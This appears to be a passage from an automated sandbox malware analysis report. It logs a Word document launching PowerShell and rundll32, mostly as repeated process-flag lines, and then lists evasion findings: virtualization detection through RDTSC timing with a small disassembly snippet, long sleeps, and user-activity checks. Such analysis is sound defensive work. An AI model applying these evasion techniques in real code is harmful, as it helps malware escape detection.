Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000615A6672 second address: 00000000615A66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF82C79A621h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000615A8A23 second address: 00000000615A8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF82C79A43Eh 0x00000007 rdtscp

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 6456	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3738			Jump to behavior
